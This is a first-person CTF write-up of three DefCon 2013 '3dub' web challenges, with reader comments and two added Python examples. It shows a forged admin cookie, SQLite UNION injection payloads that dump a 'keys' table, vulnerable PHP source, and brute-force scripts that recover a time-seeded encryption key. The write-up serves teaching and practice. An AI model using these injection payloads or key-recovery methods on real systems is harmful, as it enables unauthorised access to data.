DefCon 2013 3dub - Web-based challenges.
This is the first time I'm writing a writeup for any CTF [practice], so please bear with it :D
3dub - 1
Whatever name you enter in the username field is accepted and you are logged in with that name.
After logging in you get a message saying LOGIN as admin.
But if you enter "admin" in the username field, you get a message saying admin login is disabled.
For every login with a different username, the cookie changed.
Observation -->
username - cookie
a        - 09
b        - 0a
ab       - 09ce
ba       - 0acd
abc      - 09cd29
aaaaaa   - 09cd2994af
It's just hex-based addition with the base "aaaaa". But there's no need to do the hex addition either.
Get the cookies for:
admi  - 09c8259c
aaaan - 09cd2994a0
=> admin - 09c8259ca0
Set this cookie and refresh; you get the key.
Key: The key is: who wants oatmeal raisin anyways twumpAdby
The easiest challenge in DefCon 2013.
3dub - 2
Login page.
Obviously I tried SQL injection first. It WORKED!
I could log in as root, but that was no use because there was no key.
I tried analysing the GET and POST requests in ZAP. The response carried the query in a header:
X-SQL : SELECT name FROM users WHERE name =' ' and pasword=' ' limit 1;
Wasted time crafting requests assuming MySQL.
I could log in as root and as any number from 0 to +Inf :D
Afterwards I found out it was SQLite. Then:
- asd'OR'1'='1' UNION SELECT name FROM sqlite_master WHERE type = "table"-- (I logged in as keys.)
- asd'OR'1'='1' UNION SELECT name FROM keys --
Got the key:
logged in as The key is: literally online lolling on line WucGesJi
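An added example (not the challenge's code): the 3dub-2 query shape from the X-SQL header rebuilt against a constructed in-memory SQLite database, with the parameterised form beside it. The users/keys rows, the root password and the misspelt `pasword` column are constructed to match the writeup.

```python
"""3dub-2: string-built SQL beside the parameterised version.

Added example; the schema and rows are a constructed stand-in for the
challenge database (tables 'users' and 'keys', column spelt 'pasword'
as in the X-SQL header).
"""
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample data, not the real challenge contents.
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (name TEXT, pasword TEXT);
        CREATE TABLE keys (name TEXT);
        INSERT INTO users VALUES ('root', 'constructed-root-password');
        INSERT INTO keys VALUES ('The key is: constructed-flag-placeholder');
        """
    )
    return conn


def vulnerable_login(conn: sqlite3.Connection, name: str, password: str) -> list:
    # Exactly the shape leaked in X-SQL: user input is spliced into the statement,
    # so a quote closes the literal and UNION / -- become part of the query.
    sql = (f"SELECT name FROM users WHERE name ='{name}' "
           f"and pasword='{password}' limit 1;")
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn: sqlite3.Connection, name: str, password: str) -> list:
    # Parameter binding: the same input is compared as a value, never parsed as SQL.
    sql = "SELECT name FROM users WHERE name = ? AND pasword = ? LIMIT 1;"
    return [row[0] for row in conn.execute(sql, (name, password))]


# The second payload from the writeup; the trailing -- comments out the password clause.
UNION_PAYLOAD = "asd'OR'1'='1' UNION SELECT name FROM keys --"
```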
3dub - 4
It was an easy one, but I wasted more than 6 hours on it and still managed NOT to get the key. Like a BOSS XD
Inputs: a file name and the access code.
It opened usernames.txt with accesscode 60635c6862d44e8ac17dc5e144c66539.
But no access to passwords.txt with the same accesscode.
Found that accesscode = md5(filename).
Opened passwords.txt and was shocked to see everything was salted SHA-512 hashes.
Thought I would rather move on to the next one than decrypt these passwords.
But it would be lame to hash to that extent; that was a distraction. :p
Time to brute force the filename. Found:
key.txt with accesscode 65c2a527098e1f7747eec58e1925b453
Content of key.txt:
2GXuC0wS4O1MI8OpuoV1NkjsMM6zkzLpcQfOpMKniiogUoCS3yhTyZbm8a9BCEgHdl19bWEMziZiZDbLI+V2dQ==
The content of key.txt looked like base64. Decoded it with an online base64 decoder and got invalid ASCII, not the key!
The content of key.txt was changing with time. Suspected functions: time() and rand().
Major time waste here.
Afterwards I requested getfile.php itself, the script that was opening the files for us.
getfile.php with accesscode 0701593e23e676eaba834916a6ac7272.
Contents of getfile.php:
Acces granted to getfile.php!
    <?php
    $value = time();                        // PRNG seed: the current Unix time
    $filename = $_GET["filename"];
    $accesscode = $_GET["accesscode"];
    if (md5($filename) == $accesscode){     // accesscode must equal md5(filename)
        echo "Acces granted to $filename!\n";
        srand($value);                      // seeded from time(), so rand() is predictable
        if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt'))==TRUE){
            $data = file_get_contents($filename);
            if ($data !== FALSE) {
                if ($filename == "key.txt") {
                    $key = rand();          // the encryption key is a single rand() output
                    $cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
                    echo base64_encode($cyphertext);
                }
                else{
                    echo nl2br($data);
                }
            }
            else{
                echo "File does not exist";
            }
        }
        else{
            echo "File does not exist";
        }
    }
    else{
        echo "Invalid access code";
    }
    ?>
***k it! I'm going to sleep. But I didn't, because I had wasted a lot of time on this..
This needed a brute force; no way to do it manually.
Brute force script in PHP:
    <?php
    error_reporting(0);
    // Ciphertext of key.txt as served (base64).
    $text = "5HHOwWMXYH5UxvzIzxqMY3vuwyCJ5BVdzwm5puqduZrsPTxfsFNKXXMlwhZj5W/1oSv3ENrCpbIMF9cJQ5Gndg==";
    // Try every possible rand() output as the key: 0 .. getrandmax(), about 2^31 values.
    for ($key = 0; $key <= getrandmax(); $key++)
    {
        $data = mcrypt_decrypt(MCRYPT_RIJNDAEL_128, $key, base64_decode($text), MCRYPT_MODE_CBC);
        echo $data;
        echo "<br>";
    }
    ?>
Dumped the brute force output.
Searched it for a string starting with "the key is".
No match found. No idea WHY?
Waiting for other writeups from pros to find my mistake.
Any suggestions? Please comment.
Update on 18-06-2013-->
With the help of the comment by Célestin Perdu I got to know where I had missed the point.
You can use ZAP, Burp Suite, anything. Get the date and time of the response and convert it to a Unix timestamp:
$ date -d "which you got from the tool" +%s
Use this value as the key, and you should get the flag.
Thanks for reading. Suggestions and comments welcome!
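An added example (not the challenge's PHP and not the author's script) modelling why the search only needs a window around the response time: the key is a pure function of the time() seed. PHP's srand()/rand() and mcrypt's Rijndael-CBC are replaced by SHA-256-based stand-ins, and the Date header, seed and plaintext are constructed, so what it shows is the size of the search space (2*window+1 candidates), not PHP's exact output.

```python
"""Model of the 3dub-4 weakness: the key comes from a PRNG seeded with time().

Added example; derive_key() and xor_cipher() are stand-ins for PHP's
srand()/rand() and mcrypt, chosen so the script runs with the standard library.
"""
import hashlib
from email.utils import parsedate_to_datetime

MARKER = b"The key is"   # flags on this board start with this text


def derive_key(seed: int) -> bytes:
    # Stand-in for srand($seed); $key = rand(): the key depends on nothing but the seed.
    return hashlib.sha256(b"seed:%d" % seed).digest()[:16]


def xor_cipher(key: bytes, data: bytes) -> bytes:
    # Stand-in for mcrypt_encrypt/mcrypt_decrypt; symmetric, so it serves both directions.
    out = bytearray()
    for off in range(0, len(data), 32):
        ks = hashlib.sha256(key + off.to_bytes(4, "big")).digest()
        out.extend(b ^ k for b, k in zip(data[off:off + 32], ks))
    return bytes(out)


def encrypt_like_getfile(plaintext: bytes, now: int) -> bytes:
    # getfile.php: $value = time(); srand($value); $key = rand(); encrypt key.txt.
    return xor_cipher(derive_key(now), plaintext)


def recover_seed(ciphertext: bytes, date_header: str, window: int = 1000):
    """Scan seeds within +/- window seconds of the HTTP Date header.

    Returns (seed, plaintext, candidates_tried); seed and plaintext are None on failure.
    Only 2*window+1 candidates exist here, against ~2^31 for a blind scan of rand() outputs.
    """
    centre = int(parsedate_to_datetime(date_header).timestamp())
    tried = 0
    for offset in range(-window, window + 1):
        tried += 1
        plaintext = xor_cipher(derive_key(centre + offset), ciphertext)
        if plaintext.startswith(MARKER):
            return centre + offset, plaintext, tried
    return None, None, tried


# Constructed sample: encrypted at 1371561234; the response Date header is six seconds later.
SAMPLE_SEED = 1371561234
SAMPLE_DATE = "Tue, 18 Jun 2013 13:14:00 GMT"
SAMPLE_CIPHERTEXT = encrypt_like_getfile(b"The key is: constructed-flag-placeholder", SAMPLE_SEED)
```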
Comments -->
null poisoning?
key.txt
No.. Just manipulating the accesscode will do.
In 3dub-4, you're trying to bruteforce the key, which is not efficient.
If you look at the algorithm, the key is generated by a rand() whose seed is generated by a time() call. In other words, to get the right key, you have to find at which time the key was generated, which is rather easy: bruteforce with time()±1000 for instance, and you will find the right one eventually.
Oh yeah! I just concentrated on the encrypt and base64_encode functions. Didn't notice the srand($value).
Approx. time() then ±1000 brute force is needed. If we can get the accurate time by monitoring the packets then no brute force is needed.
Thanks for the help...